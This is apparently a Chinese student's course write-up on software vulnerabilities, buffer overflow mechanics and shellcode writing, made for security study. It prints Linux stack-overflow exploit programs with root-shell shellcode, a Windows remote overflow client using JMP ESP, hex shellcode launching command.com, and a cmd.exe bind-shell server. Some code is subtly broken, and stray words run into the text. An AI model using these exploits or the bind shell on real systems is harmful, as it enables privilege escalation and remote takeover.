问题 | 回答 |
---|---|
这个做业属于哪一个课程 | https://edu.cnblogs.com/campus/besti/19attackdefense |
这个做业的要求在哪里 | https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10723 |
我在这个课程的目标是 | 学习教材第十章,了解缓冲区溢出漏洞和Shellcode的相关知识 |
这个做业在哪一个具体方面帮助我实现目标 | 相关知识点 |
攻击者可以轻易地对系统和网络实施攻击,很大程度上是由于安全漏洞在软件中的大规模存在,攻击者能够利用这些漏洞来违背系统和网络的安全属性。安全漏洞在软件开发周期的各个环节(包括设计、编码、发布等)中均可能被引入,而只有软件设计与开发人员充分认识到安全漏洞的危害、掌握安全漏洞机理,以及如何避免漏洞的安全编程经验,并在软件厂商的软件开发生命周期中切实执行安全设计开发的流程,才有可能尽榄地减小发布软件中的安全漏洞数量,下降它们对网络与现实世界所带来的影响与危害。html
软件自从诞生之日起,就和 bug 如影随行,而其中能够被攻击者利用并致使危害的安全缺陷(Security bug)被称为软件安全漏洞(Software Vulnerability)。
美国国家标准技术研究院NIST 将安全漏洞定义为: “在系统安全流程、设计、实现或
内部控制中所存在的缺陷或弱点,可以被攻击者所利用并致使安全侵害或对系统安全策略的违反“,包括三个基本元素:系统的脆弱性或缺陷、攻击者对缺陷的可访问性,以及攻击者对缺陷的可利用性。所以一个安全脆弱性或缺陷真正被称为安全漏洞,必须是攻击者具有至少一种攻击工具或技术可以访问和利用到这一缺陷。软件安全漏洞则被定义为在软件的需求规范、开发阶段和配置过程当中引入的缺陷实例,其执行会违反安全策略。软件安全漏洞一样符合安全漏洞的三个基本元素, 同时被限制于在计算机软件中。linux
软件安全困境三要素:复杂性(Complexity)、可扩展性(Extensibility)和连通性(Connectivity),软件的这三个要素共同做用,使得软件的安全风险管理成为了一个巨大的挑战,从而很难根除安全漏洞。算法
复杂性:计算机软件通过数十年的发展,现代软件已经变得很是复杂,并且发展趋势代表,软件的规模还会更快地膨胀,变得更加复杂。而软件规模愈来愈大,愈来愈复杂,也就意味着软件的bug会愈来愈多。虽然这其中大多数 bug 并不会形成安全问题,或者没法被攻击者所利用,但只要攻击者可以从中发现出少数几个可利用的安全漏洞,他们就能够利用这些安全漏洞来危害软件的使用者。shell
可扩展性:致使软件安全困境的第二个要素是软件的可扩展性。现代软件为了支持更加优化的软件架构,支持更好的客户使用感觉,每每都会提供一些扩展和交互渠道。但正是现代可扩展软件自己的特性使得安全保证更加困难,首先,很难阻止攻击者和恶意代码以不可预测的扩展方式来入侵软件和系统;其次,分析可扩展性软件的安全性要比分析一个彻底不能被更改的软件要因可贵多。编程
连通性:互联网的普及使得全球更多的软件系统都连通在一块儿,不只是接入互联网的计算机数量快速增长,一些控制关键基础设施的重要信息系统也与互联网创建起了连通性。高度的连通性使得—个小小的软件缺陷就有可能影呐很是大的范围,从而引起巨大的损失。windows
做为软件安全漏涧标准目录 CVE 的维护机构,MITRE 曾给出了在 CVE 中归档的安全
漏洞类型统计状况及发展趋势, 从安全漏洞的技术机理方面一共列举出了37类, 并统计了2001-2006 年中最流行的 Top 10 安全漏洞类型,以下图所示
数组
内存安全违规类(MemorySafety Violations):内存安全违规类漏利是在软件开发过程当中在处理RAM (random-access memory) 内存访问时所引入的安全缺陷,如缓冲区溢出漏洞和 Double Free、Use-after-Free 等不安全指针问题等。内存安全违规类漏洞主要出如今 C/C++ 等编程语言所编写的软件程序中,因为这类语言支待任意的内存分配与归还、任意的指针计算、转换,而这些操做一般没有进行保护确保内存安全,于是很是容易引入此类漏洞。sass
输入验证类(Input Validation Errors):输入验证类安全漏洞是指软件程序在对用户输入进行数据验证存在的错误,没有保证输入数据的正确性、合法性和安全性,从而致使可能被恶意攻击与利用。输入验证类安全新洞根据输入位置、恶意输入内容被软件程序的使用方式的不一样,又包含格式化字符串、SQL 注入、代码注入、远程文件包含、目录遍历、XSS、HTTP Header 注入、HTTP 响应分割错误等多种安全漏洞技术形式。输入验证类安全漏洞,特别是针对目前流行的 Web 应用程序的输入验证类漏洞,近年来已经成为攻击者最广泛利用的目标。安全
竞争条件类(Race Conditions Errors):竞争条件类缺陷是系统或进程中一类比较特殊的错误,一般在涉及多进程或多线和处理的程序中出现,是指处理进程的输出或者结果没法预测,并依赖于其余进程事件发生的次序或时间时,所致使的错误。网络
权限混淆与提高类(Privilege confusion and escalation bugs):权限混淆与提高类漏洞是指计算机程序由千自身编程疏忽或被第三方欺骗,从而滥用其权限,或赋予第三方不应给予的权限。权限混淆与提高类漏洞的具体技术形式主要有 Web 应用程序中的跨站请求伪造(Cross-Site Request Forgery,CSRF)、Clickjacking、FTP反弹攻击、权限提高、"越狱" (jailbreak) 等。
缓冲区溢出 (Buffer Overflow) 是最先被发现也是最基础的软件安全漏洞技术类型之 一。
缓冲区溢出是计算机程序中存在的一类内存安全违规类漏洞,在计算机程序向特定缓冲区内填充数据时,超出了缓冲区自己的容量,致使外溢数据覆盖了相邻内存空间的合法数据,从而改变程序执行流程破坏系统运行完整性。理想状况下,程序应检查每一个输入缓冲区的数据长度,并不容许输入超出缓冲区自己分配的空间容量,可是大量程序老是假设数据长度是与所分配的存储空间是相匹配的,于是很容易产生缓冲区溢出漏洞。
缓冲区溢出攻击发生的根本缘由,能够认为是现代计算机系统的基础架构——冯·诺伊曼休系存在本质的安全缺陷,即采用了 “存储程序” 的原理,计算机程序的数据和指令都在同一内存中进行存储而没有严格的分离。这一缺陷使得攻击者能够将输入的数据,经过利用缓冲区溢出漏洞,覆盖修改程序在内存空间中与数据区相邻存储的关键指令,从而达到使程序执行恶意注入指令的攻击目的。
命令 | 做用 |
---|---|
break/clear | 来启用或禁用断点 |
enable/disable | 来启用或禁用断点 |
watch | 可设置监视表达式值改变时的程序中断 |
run | 运行程序 |
attach | 调试已运行进程 |
continue | 继续运行 |
next | 单步代码执行并不进入函数调用 |
nexti | 单步指令执行并不进入函数调用 |
step | 单步代码并跟入函数调用 |
stepi | 单步指令并跟入函数调用 |
info | 查看各类信息 |
backtrace | 显示调用栈 |
x | 限制指定地址内容 |
显示表达式值 | |
list | 列出程序源码需调试程序带符号编译 |
disass | 反汇编指定函数 |
对于 Windows 平台,微软的 Visual Studio、VS.Net 是比较经常使用的集成开发环境,但对于以调试 C/C++ 语言为主的软件安全漏洞及渗透利用代码,使用 VC++ 便可,VC++集成开发环境中集成了微软自身的 C/C++ 编译器与链接器,以及自带的调试与反汇编功能。
在熟悉 IA32 架构寄存器以后,咱们还须要熟悉一些经常使用汇编指令的含义,有 IA32 架构汇编语言中,又分为 Intel 和 AT&T 两种具备不少差别的汇编格式。在类 UNIX 平台下,一般使用 AT&T 汇编格式,而在 DOS/Windows 平台下,则主要使用 Intel 汇编格式。
进程内存管理:Linux 操做系统中的进程内存空间布局和管理机制: 程序在执行时,系统在内存中会为程序建立一个虚拟的内存地址空间,在 32 位机上即 4GB 的空间大小,用于映射物理内存,并保存程序的指令和数据;Linux 的进程内存空间布局以下图所示,3GB(即0xc0000000)如下为用户态空间,3GB-4GB 为内核态空间;操做系统将可执行程序加载到新建立的内存空间中,程序通常包含 .text、.bss 和 .data 三种类型的段,.text段包含程序指令,在内存中被映射为只读,.data 段主要包含静态初始化的数据,而 .bss 段则主要包含未经初始化的数据,二者都被映射至可写的内存空间中;加载完成后,系统紧接着就开始为相序初始化 “栈” (Stack)和“ 堆” (Heap),“栈” 是一种后进先出的数据结构,其地址空间从商地址向低地址增加,Linux程序运行的环境变量 env 、运行参数 argv、运行参数数量 argc 都被放置在 “栈” 底,而后是主函数及调用 “栈” 中各个函数的临时保存信息,“堆” 则是一种先进先出的数据结构,用于保存程序动态分配的数据和变量,其地址空间从低地址往高地址增加,与 “栈” 正好相反;程序执行时,就会按照程序逻辑执行 .text 中的指令,并在 “堆” 和 “栈” 中保存和读取数据。
Windows 操做系统的进程内存空间布局则与 Linux系统有着一些差别,以下图所示,2GB-4GB 为内核态地址空间,用于映射 Windows 内核代码和一些核心态 DLL,并用于存储一些内核态对象,0GB-2GB为用户态地址空间,高地址段映射了一些大量应用进程所共同使用的系统 DLL,如 Kernel32.dll、User32.dll等,在 1GB 地址位置用于装载一些应用进程自己所引用的 DLL 文件,可执行代码区间从0x00400000 开始, 而后是静态内存空间用于保存全局变量与静态变量,“堆” 一样是从低地址向高地址增加,用于存储动态数据,“栈” 也是从高地址向低地址增加,在单线程进程中通常的 “栈” 底在0x0012XXXX的位置。
函数调用过程:栈结构与函数调用过程的底层细节是理解栈溢出攻击的重要基础,由于栈溢出攻击就是针对函数调用过程当中返回地址在栈中的存储位置,进行缓冲区溢出,从而改写返回地址,达到让处理器指令寄存器跳转至攻击者指定位置执行恶意代码的目的。
程序进行函数调用的过程有以下三个步骤:
缓冲区溢出漏洞根据缓冲区在进程内存空间中的位置不一样,又分为栈溢出、堆溢出和内核溢出这三种具体技术形态,栈溢出是指存储在栈上的一些缓冲区变量因为存在缺少边界保护问题,可以被溢出并修改栈上的敏感信息(一般是返回地址),从而致使程序流程的改变。堆溢出则是存储在堆上的缓冲区变量缺少边界保护所遭受溢出攻击的安全问题,内核溢出漏洞存在于一些内核模块或程序中,是因为进程内存空间内核态中存储的缓冲区变量被溢出形成的。
下面以栈溢出安全漏洞为例,来说解缓冲区溢出攻击的基本原理
#include <stdio.h> void return_input(void){ char array[30]; gets(array); printf("%s\n", array); } int main (void){ return_input(); return 0; }
这段代码中return_input()
函数中定义了一个局部变量array
,为30字节长度的字符串缓冲区,按照咱们对进程内存空间布局和各种型变量存储位置的了解,函数局部变量将被存储在栈上, 并位于main()
函数调用时压栈的下一条指令(即return 0;
) 返回地址之下,而在retum_input()
函数中执行gets
函数将用户终端输入至array
缓冲区时,没有进行缓冲区边界检查和保护,所以若是用户输入超出30字节的字符串时,输入数据将会溢出array
缓冲区,从而覆盖array
缓冲区上方的EBP
和RET
, 一旦覆盖了RET
返回地址以后,在return_input()
函数执行完毕返回main()
函数时,EIP
寄存器将会装载栈中RET
位置保存的值,此时该位置已经被溢出改写为溢出的字符串,而该字符串多是进程没法读取的空间, 因此可能会形成程序的段错误(Segmentation fault
)
在上述的示例代码中,咱们输入的数据成功地溢出了缓冲区,修改了EBP
和RET
的内容,形成了程序进程的崩溃,若是是一些重要的程序进程,如网络服务进程,那么它的崩溃就意味着拒绝服务攻击。固然真正的黑客不会知足于只是形成程序的崩溃,他们还指望更进一步地控制程序的执行流程,从而经过溢出得到目标程序或系统的访问控制权。为了达到这一目标,就须要精心地构造缓冲区溢出攻击,解决以下三个问题:
RET
返回地址在栈中的存储位置。来看这段示例代码
#include <stdio.h> #include <string.h> char shellcode[]= // setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 char large_string[128]; int main(int argc, char **argv){ char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < (int) strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer, large_string); return 0; }
这段示例代码中 6字节长度的局部变量buffer
在漏洞利用点strcpy()
函数缺少边界安全保护,攻击者经过精心构造large_string
这一个128字节长度的数据, 仅在其在低地址包含一段 Shellcode代码(0—31),而其余均填充为指向buffer
起始位置的地址(即被覆盖后large_string
中的 Shellcode 起始地址),在漏洞利用点执行strcpy
操做以后,buffer
缓冲区会被溢出,main 函数的返回地址RET
将会被覆盖并改写为 Shellcode 的起始地址,所以在return
时,EIP
寄存器装载改写后RET
值,并将程序执行流程跳转至 Shellcode 执行。
在这个示例代码中,溢出攻击的第一个关键问题——定位须要修改的敏感位置,即栈中的返回地址,根据对栈结构与内存布局,咱们能够定位返回地址位于要溢出的buffer变量的高地址位置。第二个关键问题——将敏感位置的值修改成什么,示例代码中将其改写为直接指向 Shellcode 的地址。第三个关键问题——执行什么代码,示例代码中保护了一段代码,用于系统调用,开启一个命令行 shell。
Linux平台中的栈溢出攻击按照攻击数据的构造方式不一样,主要有NSR、RNS 和 RS 三种模式。
Nop
指令(即空操做指令)以后填充 Shellcode,再加上一些指望覆盖RET
返回地址的跳转地址,从而构成了 NSR 攻击数据缓冲区。#include<stdio.h> int main(int argc,char **argv){ char buf[500]; strcpy(buf,argv[1]); printf("buf's 0x%8x\n",&buf); getchar(); return 0; }
而后是一段攻击者精心构造的攻击代码
#include<stdio.h> #include<stdlib.h> #include<string.h> char shellcode[]= // setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 unsigned long get_esp(){ __asm__("movl %esp,%eax"); } int main(int argc,char *argv[]){ char buf[530]; char* p; p=buf; int i; unsigned long ret; int offset=0; /* offset=400 will success */ if(argc>1) offset=atoi(argv[1]); ret=get_esp()-offset; memset(buf,0x90,sizeof(buf)); memcpy(buf+524,(char*)&ret,4); memcpy(buf+i+100,shellcode,strlen(shellcode)); printf("ret is at 0x%8x\n esp is at 0x%8x\n", ret,get_esp()); execl("./vulnerable1","vulnerable1",buf,NULL); return 0; }
攻击代码的核心是在于调用vulnerable1
时传入的字符串。能够看到咱们在程序中定义的字符串的空间大小是500字节,可是在咱们实际调用的过程当中,传入的字符串的大小是530字节。咱们如今分析这长度为530的字符串的组成方式,首先前500字节都被0x90
填充,也就是咱们熟知的NOP
;接下来的就是上文中提到的 Shellcode;最后就是4个字节的地址,这个地址ret
是经过计算获得的,根据咱们程序参数的不一样,将跳到咱们使用NOP
设置的着陆区之中,而不管跳转到哪一个Nop
指令,程序都会继续执行,并最终运行 Shellcode ,向攻击者给出 Shell。
#include<stdio.h> int main(int argc,char **argv){ char buf[10]; strcpy(buf,argv[1]); printf("buf's 0x%8x\n",&buf); getchar(); return 0; }
接下来看在 RNS 模式下的攻击代码(shellcode部分与上文相同)
#include<stdio.h> #include<stdlib.h> #include<string.h> char shellcode[]; int main(int argc,char **argv){ char buf[500]; unsigned long ret,p; int i; p=&buf; ret=p+70; memset(buf,0x90,sizeof(buf)); for(i=0;i<44;i+=4) *(long *)&buf[i]=ret; memcpy(buf+400+i,shellcode,strlen(shellcode)); execl("./vulnerable2","vulnerable2",buf,NULL); return 0;
一样地,攻击代码的核心是在于调用vulnerable2
时所传入的字符串。但由于缓冲区的大小只有10字节,因此攻击数据按照从低地址到高地址(数组中先定义的为低地址,后定义的为高地址)的构造方式是首先填充一些指望覆盖ret
返回地址的跳转地址,而后是一堆Nop
指令填充出 “着陆区 ”,最后再是 Shellcode。在溢出攻击以后,攻击数据将在ret
区段即溢出了目标漏洞程序的小缓冲区,并覆盖了栈中的返回地址,而后跳转至Nop
指令所构成的“ 着陆区 ”,并最终执行 Shellcode。
Nop
空指令构建 “着陆区” 。ret=0xc0000000-sizeof(void*)-sizeof(FILENAME)-sizeof(Shellcode)
漏洞的程序就是上文提到的 vulnerable2.c
接下来咱们给出攻击代码(shellcode部分与上文相同)
#include<stdio.h> char shellcode[]; int main(int argc,char **argv){ char buf[32]; char *p[]={"./vulnerable2",buf,NULL}; char *env[]={"HOME=/root",shellcode,NULL}; unsigned long ret; ret=0xc0000000-strlen(shellcode)-strlen("./vulnerable2")-sizeof(void *); memset(buf,0x41,sizeof(buf)); memcpy(&buf[28],&ret,4); printf("ret is at 0x%8x\n",ret); execve("./vulnerable2", "/vulnerable2", buf, env); return 0; }
这个代码的RET
地址是精确计算出来的。咱们能够看到计算出的返回地址是基于栈地址开始的位置、惟一的环境变量的长度、函数参数的长度、函数指针的长度计算出来,也就是程序中环境变量。这样能够保证在攻击缓冲区中填充直接跳转至 Shellcode 的起始地址,在溢出并改写栈中保存的返回地址以后,程序控制流程将跳
转至 Shellcode 并执行。
Linux 平台上的远程栈溢出攻击的原理与本地栈溢出是同样的,区别在于用户输入传递的途径不一样,以及 Shellcode 的编写方式不一样。
本地栈溢出的用户输入传递途径主要为 argv 命令行输入、文件输入等,而远程栈溢出的用户输入传递途径则是经过网络,存在远程栈溢出漏洞的每每是一些网络服务进程或网络应用程序,攻击者能够在网络应用层协议交互过程当中,利用上述介绍的模式构造恶意网络数据包,发送给漏洞程序,从而进行渗透攻击。
NSR 和 RNS 模式也都适用千远程栈溢出攻击, 使用场景也主要取决千被溢出的目标缓冲区大小是否足够容纳 Shellcode。因为 RS 模式是经过本地的 execve()
将Shellcode 放置在环境变量中传递给目标漏洞程序的,所以这种模式不适用于经过网络的远程缓冲区溢出攻击,而只能用于本地缓冲区溢出攻击。
Shellcode 是一段机器指令,对于咱们一般接触的 IA32 架构平台,Shellcode就是符合 Intel 32 位指令规范的一串 CPU 指令, 被用于溢出以后改变系统正常流程,转而执行 Shellcode 以完成渗透测试者的攻击目的,一般是为他提供一个访问系统的本地或远程命令行访问(即Shell)。按照在本地溢出攻击和远程溢出攻击使用场景的不一样,又分为本地 Shellcode 和远程 Shellcode。
execve()
函数启动/bin/sh
提供命令行。#include <stdio.h> int main ( int argc, char * argv[] ) { char * name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve( name[0], name, NULL ); }
可是咱们没法直接将这段 C 语言源代码做为注入攻击负载,提供给目标程序进行执
行。做为可以让目标程序被溢出以后跳转执行的代码,咱们必须提供以二进制指令形式存在的 Shellcode。
mov $0x0,%edx push %edx push $0x68732f6e push $0x69622f2f mov %esp,%ebx push %edx push %ebx mov %esp,%ecx mov $0xb,%eax int $0x80
这段代码从左到右的次序,分别将execve()
函数的参数NULL(0x0)
、name
变量地址、/bin/sh
字符串地址压入栈中,而后将eax
赋值为execve()
系统调用号0xb
,执行int 0x80
软中断,即调用了execve()
函数,并将压栈的输入参数传递给execve()
函数例程,从而完成开启 Shell 的功能。
xor %edx,%edx push %edx push $0x68732f6e push $0x69622f2f mov %esp,%ebx push %edx push %ebx mov %esp,%ecx mov $0xb,%eax int $0x80
这段代码与上段代码具备彻底相同的程序,引入的二进制指令空字节 即OxOO 或NULL) 进行消除,如在mov $0x0, %edx
指令中0x0当即数中存在着的空字节等,进行空字节的消除处便是为了使得最终编制的 Shellcode 中不有在空字节,从而避免在渗透攻击中对strcpy()
等字符串操做函数时,在空字节处截断 Shellcode 导致攻击失效。
在得到汇编语言实现的 Shellcode 以后,咱们能够经过查找 Intel opcode 指令参考手册,便可得到 opcode 二进制指令形式的 Shellcode,最终得到的 opcode 二进制指令代码以下所示。
char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
以上咱们介绍了 Linux 系统中一个最简单的本地 Shellcode 的产生过程,而这个过程事实上也体现了 Shellcode 的通用方法,包括以下 5 个步骤:
从技术上分析,因为Windows橾什系统与Linux操做系统在进程内存空间布局、系统
对栈的处理方式、系统功能调用方式等方面的实现差别,虽然栈溢出的基础原理和大体流程是一致的,但在具体的攻击实施细节、Shellcode 编制等方面仍是存在一些差异。
为了应对这前两点差别对 Windows 平台上栈溢出攻击所带来的挑战,1999年 Dark Spyrit 提出使用系统核心DLL中的JMP ESP
指令来完成控制流程的跳转。在函数调用结束装载返回地址的时刻,ESP 指针刚好是指向了注入攻击缓冲区数据中的Nop
指令和 Shellcode,那么若是咱们将返回地址改写为一个指向JMP ESP
操做指令的高位地址,使得这个地址中不含空字节(也就不会被字符串操做函数所截断),那咱们就能够构造出一段能够成功实施栈溢出的攻击数据,由于目标程序在函数调用完成执行RET
指令时,就会将在返回地址位置改写的指令地址装载入 EIP 寄存器,并跳转至该地址继续执行,而这个地址指向的指令是JMP ESP
,同时 ESP 寄存器又偏偏指向的是栈上 Nop 和 Shellcode 的位置,所以这条指令会帮助咱们将程序流程返回到栈上,转而执行所注入的 Shellcode 。JMP ESP
的地址能够在一般能够在进程内存空间中 1GB 到 2GB 区间中装载的系统核心DLL (如Kernel32.dll 、User32.dll 等)中找到。
int main() { WSADATA wsa; SOCKET sockFD; char Buff[1024],*sBO; WSAStartup(MAKEWORD(2,2),&wsa); sockFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(3764); server.sin_addr.s_addr=inet_addr("127.0.0.1"); connect(sockFD,(struct sockaddr *)&server,sizeof(server)); for(int i=0;i<56;Buff[i++]=0x90); strcpy(Buff+56,(char *)eip); strcpy(Buff+60,(char *)sploit); sBO = Buff; send(sockFD,sBO,56+4+560,0); closesocket(sockFD); WSACleanup(); return 1; }
能够看到传入字符串的大小是1024字节,而后咱们先填充了若干字节的NOP做为着陆区,接下来咱们填入了指向JMP ESP
指令的地址,最后将咱们 Shellcode 放到目标地址上,使得send()
将攻击数据经过socket
发送给目标函数的服务的时候,将处理函数的 ESP 覆盖,跳转到咱们事先定义好的 Shellcode
为了使得 Windows 中的 Shellcode 可以调用操做系统功能以完成攻击目标,并可以在指望注入的不一样目标程序中正常运行,咱们须要考虑以下问题:
command.com
或cmd.exe
,Windows 32的系统 API 中提供了system()
函数调用,能够用于启动指定程序或运行特定命令,在调用system(command.com
)以后便可启动命令行程序。LoadLibrary()
函数加载msvcrt.dll
动态连接库,并经过GetProcAddress()
函数得到system
函数的加载入口地址,赋值给 ProcAdd 函数指针,而后经过函数指针调用 system()
函数, 启动命令行 Shell:为了使得目标程序在攻击以后正常终止,Shellcode 中还能够调用exit()
函数退出当前进程。#include <windows.h> #include <winbase.h> typedef void (*MYPROC)(LPTSTR); typedef void (*MYPROC2)(int); int main() { HINSTANCE LibHandle; MYPROC ProcAdd; MYPROC2 ProcAdd2; char dllbuf[11] = "msvcrt.dll"; char sysbuf[7] = "system"; char cmdbuf[16] = "command.com"; char sysbuf2[5] = "exit"; LibHandle = LoadLibrary(dllbuf); ProcAdd = (MYPROC)GetProcAddress( LibHandle, sysbuf); (ProcAdd) (cmdbuf); ProcAdd2 = (MYPROC2) GetProcAddress( LibHandle, sysbuf2); (ProcAdd2)(0); }
接下来咱们将其翻译成汇编语言,获得的结果以下:
push ebp mov ebp,esp xor eax,eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0x77E5D961 push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] /* system("command.com") */ mov esp,ebp push ebp mov ebp,esp xor edi,edi push edi sub esp,08h mov byte ptr [ebp-0ch],63h mov byte ptr [ebp-0bh],6fh mov byte ptr [ebp-0ah],6dh mov byte ptr [ebp-09h],6Dh mov byte ptr [ebp-08h],61h mov byte ptr [ebp-07h],6eh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],63h mov byte ptr [ebp-03h],6fh mov byte ptr [ebp-02h],6dh lea eax,[ebp-0ch] push eax mov eax, 0x77bf8044 call eax /* exit */ push ebp mov ebp,esp mov edx,0x77c07adc push edx xor eax,eax push eax call dword ptr[ebp-04h]
最后翻译为二进制机器码
char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8" "\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x61\xD9\xE5\x77\x52" "\x8D\x45\xF4\x50\xFF\x55\xF0\x8B\xE5\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x08\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6" "\x45\xF6\x6D\xC6\x45\xF7\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x63" "\xC6\x45\xFD\x6F\xC6\x45\xFE\x6D\x8D\x45\xF4\x50\xB8\x44\x80\xBF\x77\xFF\xD0\x55\x8B\xEC\xBA\xDC\x7A\xC0\x77" "\x52\x33\xC0\x50\xFF\x55\xFC";
#include <winsock2.h> #include <stdio.h> #pragma comment (lib,"ws2_32") int main() { WSADATA wsa; SOCKET listenFD; char Buff[1024]; int ret; WSAStartup(MAKEWORD(2,2),&wsa); listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(53764); server.sin_addr.s_addr=ADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2); int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); /* 这段代码是用来创建一个Tcp Server的,咱们先申请一个socketfd, 使用53764(随便,多少都行)做为这个socket链接的端口,bind他, 而后在这个端口上等待链接listen。程序阻塞在accept函数直到有 client链接上来。 */ SECURITY_ATTRIBUTES sa; sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); /* 建立两个匿名管道。hReadPipe只能用来读管道,hWritePipe1只能用来写管道。 */ STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; char cmdLine[] = "cmd.exe"; PROCESS_INFORMATION ProcessInformation; ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); /* 这段代码建立了一个shell(cmd.exe),而且把cmd.exe的标准输入用第二个管道的读句柄替换。cmd.exe的标准输出和标准错误输出用第一个管道的写句柄替换。 这两个管道的逻辑示意图以下: (父进程) read<---〔管道一〕<---write 标准输出(cmd.exe子进程) (父进程) write--->〔管道二〕--->read 标准输入(cmd.exe子进程) */ unsigned long lBytesRead; while(1) { ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead) { ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; ret=send(clientFD,Buff,lBytesRead,0); if(ret<=0) break; }else { lBytesRead=recv(clientFD,Buff,1024,0); if(lBytesRead<=0) break; ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0) ; if(!ret) break; } } /* 这段代码完成了客户输入和shell的交互。PeekNamedPipe用来异步的查询管道一,看看shell是否有输出。若是有就readfile读出来,并发送给客户。若是没有,就去接受客户的输入。并 writefile 写入管道传递给shell. 这两个管道与client和server的配合逻辑图以下: 输入命令(Client) <-- send(父进程)read<--〔管道一〕<--write 标准输出(cmd.exe子进程) 得到结果(Client) recv-->(父进程)write-->〔管道二〕-->read 标准输入(cmd.exe子进程) */ return 0; }
堆溢出(Heap Overflow)是缓冲区溢出中第二种类型的攻击方式,因为堆中的内存分配与管理机制较栈更为复杂,不一样操做系统平台的实现机制都具备显著的差别,同时经过堆中的缓冲区溢出控制目标程序执行流程须要更精妙的构造,所以堆溢出攻击的难度较栈溢出要复杂不少,真正掌握、理解并运用堆溢出攻击也更为困难一些。
下面简要地经过对函数指针改写、C++类对象虚函数表改写以及 Linux 下堆管埋漏洞攻击案例讲解,来讲明堆溢出攻击的基本原理
函数指针改写:这种攻击方式要求被溢出的缓冲区临近全局函数指针存储地址,且在其低地址方向上。若是向缓冲区填充数据的时候,若是没有边界控制和判断的话,缓冲区溢出就会天然的覆盖函数指针所在的内存区,从而改写函数指针的指向地址,则程序在使用这个函数指针调用原先的指望函数的时候就会转而执行 Shellcode
C++ 类对象虚函数表改写:C++类经过虚函数提供了一种 Late bingding 运行时绑定机制,编译器为每一个虚函数的类创建起虚函数表、存放虚函数的地址,并在每一个类对象的内存区中放入一个指向虚函数表的指针。对于使用了难函数机制的C++ 类, 若是它的类成员变量中存在可被溢出的缓冲区,那么就能够进行堆溢出攻击,经过覆盖类对象的虑函数指针,使只指向一个特殊构造的虚函数表, 从而转向执行攻击者恶意注入的指令。
